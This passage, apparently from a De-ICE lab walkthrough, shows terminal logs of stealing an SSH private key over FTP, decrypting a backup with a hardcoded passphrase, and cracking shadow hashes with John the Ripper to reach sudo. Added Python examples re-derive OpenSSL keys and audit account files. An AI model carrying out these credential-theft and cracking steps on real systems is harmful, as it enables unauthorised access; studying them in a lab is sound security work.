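Two things in the openssl output above are worth understanding rather than just reading off: where the salt, key and IV printed by -p come from, and why a decryption that exits 0 can still produce a file that `file` calls "data". The following is an added example (not from the original post) that re-derives the printed values in pure Python. It implements the legacy OpenSSL EVP_BytesToKey derivation, which is what `openssl enc` used by default before 1.1.0: one MD5 round over passphrase||salt, then repeated over previous-digest||passphrase||salt until enough bytes exist for key and IV. Because a single unsalted-strength MD5 iteration is all that stands between a guess and the key, the passphrase's own entropy is the only protection this format gives; that is also why the wordlist loop above runs at wordlist speed. The gzip-magic check at the end is the sanity test the author effectively did with `file`: CBC decryption under the wrong cipher or passphrase still succeeds whenever the final padding byte happens to be valid. The cipher sizes and the MD5/count=1 defaults are my assumptions about this OpenSSL version; the test confirms them against the values the page printed.

```python
import hashlib

# First 16 bytes of backup_webhost_130111.tar.gz.enc, as printed by hd above:
# the ASCII magic "Salted__" followed by the 8-byte salt.
ENC_HEADER = bytes.fromhex("53616c7465645f5f6e39351efaaceab9")

# (key length, IV length) in bytes for the two ciphers that appear on this page.
CIPHER_SIZES = {"des3": (24, 8), "aes-256-cbc": (32, 16)}


def parse_salted_header(data):
    """Return the 8-byte salt of an OpenSSL 'Salted__' file, or None if the magic is absent."""
    if len(data) < 16 or data[:8] != b"Salted__":
        return None
    return data[8:16]


def evp_bytes_to_key(password, salt, key_len, iv_len, hash_name="md5", count=1):
    """Legacy OpenSSL EVP_BytesToKey.

    D_1 = H^count(password || salt), D_i = H^count(D_{i-1} || password || salt),
    and key || iv is D_1 || D_2 || ... truncated to key_len + iv_len bytes.
    'openssl enc' before 1.1.0 used MD5 with count=1 unless told otherwise.
    """
    material, prev = b"", b""
    while len(material) < key_len + iv_len:
        d = prev + password + salt
        for _ in range(count):
            d = hashlib.new(hash_name, d).digest()
        prev = d
        material += d
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_for_cipher(password, salt, cipher):
    """Reproduce the salt/key/iv lines that 'openssl enc -p' prints for a given cipher."""
    key_len, iv_len = CIPHER_SIZES[cipher]
    key, iv = evp_bytes_to_key(password, salt, key_len, iv_len)
    return {"salt": salt.hex().upper(), "key": key.hex().upper(), "iv": iv.hex().upper()}


def looks_like_gzip(plaintext):
    """Cheap plausibility check on decrypted output: a .tar.gz starts with 1f 8b.

    A successful 'openssl enc -d' only guarantees valid PKCS#7 padding on the last
    block, so garbage output with exit status 0 is normal for a wrong cipher.
    """
    return plaintext[:2] == b"\x1f\x8b"


if __name__ == "__main__":
    salt = parse_salted_header(ENC_HEADER)
    for cipher in CIPHER_SIZES:
        print(cipher, derive_for_cipher(b"absconder", salt, cipher))
```

Running it with the des3 sizes reproduces exactly the salt, key and iv that `openssl enc -d -des3 ... -p` printed above, which confirms the derivation; the aes-256-cbc line shows what the same passphrase would have produced for the cipher the backup script actually used, and the two differ in every byte, which is why the des3 attempt yielded "data".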

root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.102:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 mbrown   mbrown       1675 Mar 10  2013 downloadkey
-rw-------   1 mbrown   mbrown       1675 Mar 10  2013 id_rsa
-rw-r--r--   1 mbrown   mbrown        396 Mar 10  2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (5002.3 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (396 bytes)
226 Transfer complete
396 bytes received in 0.00 secs (4345.2 kB/s)
ftp>

root@kali:~# more downloadkey
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'downloadkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: downloadkey
Permission denied (publickey).
root@kali:~# chmod 600 downloadkey
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$

mbrown@webhost:~$ uname -a
Linux webhost 3.5.0-28-generic #48~precise1-Ubuntu SMP Wed Apr 24 21:43:05 UTC 2013 i686 i686 i386 GNU/Linux
mbrown@webhost:~$ pwd
/home/mbrown

mbrown@webhost:~$ su rhedley
Password:
rhedley@webhost:/home/mbrown$

... some privilege escalation processes...

rhedley@webhost:/home/mbrown$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp

TMPBACKUP="/tmp/backup";

NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}

root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression

root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root         0 2013-05-13 22:57 etc/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root    125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root       302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root      1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root      3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root      1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root      1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root      1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root         0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root      3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root      4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root       419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root      2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root      2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root      2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root      1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root       728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root       675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root       220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root      3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root       881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root       753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root      6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root       214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root      5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root      7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root      6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root        95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root      1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root      7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root       483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root      1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root       366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root       391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root       335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root       743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root      2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root        65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root      3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl     12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root       724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root        19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root      3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root       848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root       854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root     19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root         0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow    1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root      1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root       726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root       519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root       490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root       509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root        77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root       506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root        87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root      3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root      1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root      1194 2013-01-11 23:42 etc/passwd

root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz

root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley          (rhedley)
mbrown           (mbrown)
mparker          (mparker)
swillard         (swillard)
guesses: 4  time: 0:00:00:00 DONE (Wed Jan  8 11:12:15 2014)  c/s: 50.00  trying: swillard

root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:

root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo   (sraines)
guesses: 1  time: 0:00:36:46 DONE (Wed Jan  8 12:22:24 2014)  c/s: 268  trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User swillard may run the following commands on this host:
    (ALL : ALL) ALL

swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh  secret.jpg
swillard@webhost:/home/mbrown$
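The archive handed over etc/shadow-, etc/shadow, etc/group and etc/passwd in one go, and the session above shows why that matters: the sudo group still lists sraines although the live system no longer knows that user, and every hash in the backup could be cracked offline. The audit below is an added example, not part of the original post or the De-ICE image; it runs the checks a defender would want over such a backup (privileged group members without an account, hashes that survive only in the shadow- copy, weak or empty hashes). The sample files, the user deploy and the hash strings are constructed placeholders.

```python
STRONG = ("$6$", "$5$", "$y$", "$7$")  # sha512crypt, sha256crypt, yescrypt, scrypt


def parse_colon_file(text):
    """Map the first field (user or group name) to the full field list of a passwd/group/shadow line."""
    rows = [ln.split(":") for ln in text.splitlines() if ln and not ln.startswith("#")]
    return {r[0]: r for r in rows}


def is_locked(h):
    """'*' or a '!'-prefixed hash means the account cannot log in with a password."""
    return h == "*" or h.startswith("!")


def audit(passwd_text, group_text, shadow_text, shadow_prev_text, privileged=("sudo", "adm", "shadow")):
    passwd, groups = parse_colon_file(passwd_text), parse_colon_file(group_text)
    shadow, prev = parse_colon_file(shadow_text), parse_colon_file(shadow_prev_text)
    findings = {"stale_privileged_members": [], "orphaned_backup_hashes": [], "weak_hashes": set()}
    # 1. Privileged group members with no passwd entry: membership outlived the account.
    for gname in privileged:
        for member in filter(None, groups.get(gname, [gname, "", "", ""])[3].split(",")):
            if member not in passwd:
                findings["stale_privileged_members"].append((gname, member))
    # 2. Usable hashes present only in the shadow- copy: crackable offline, invisible to the live system.
    for user, fields in prev.items():
        if user not in shadow and fields[1] and not is_locked(fields[1]):
            findings["orphaned_backup_hashes"].append(user)
    # 3. Empty passwords or hashes not using a modern crypt(3) scheme, in either copy.
    for user, fields in list(prev.items()) + list(shadow.items()):
        if not is_locked(fields[1]) and not fields[1].startswith(STRONG):
            findings["weak_hashes"].add(user)
    findings["weak_hashes"] = sorted(findings["weak_hashes"])
    return findings


# Constructed sample files loosely modelled on the archive above; hash values are placeholders, not real hashes.
PASSWD = "mbrown:x:1001:1001::/home/mbrown:/bin/bash\nrhedley:x:1002:1002::/home/rhedley:/bin/bash\n"
GROUP = "root:x:0:\nsudo:x:27:sraines\nshadow:x:42:\nmbrown:x:1001:\n"
SHADOW = ("root:*:15716:0:99999:7:::\n"
          "mbrown:$6$c0nstructed$placeholder1:15716:0:99999:7:::\n"
          "rhedley:$6$c0nstructed$placeholder2:15716:0:99999:7:::\n")
SHADOW_PREV = (SHADOW +
               "mparker:$1$c0nstructed$placeholder3:15716:0:99999:7:::\n"  # md5crypt, constructed
               "deploy::15716:0:99999:7:::\n")                             # empty password, constructed

if __name__ == "__main__":
    for kind, hits in audit(PASSWD, GROUP, SHADOW, SHADOW_PREV).items():
        print(f"{kind}: {hits}")
```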

That's all.

Some hints from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html
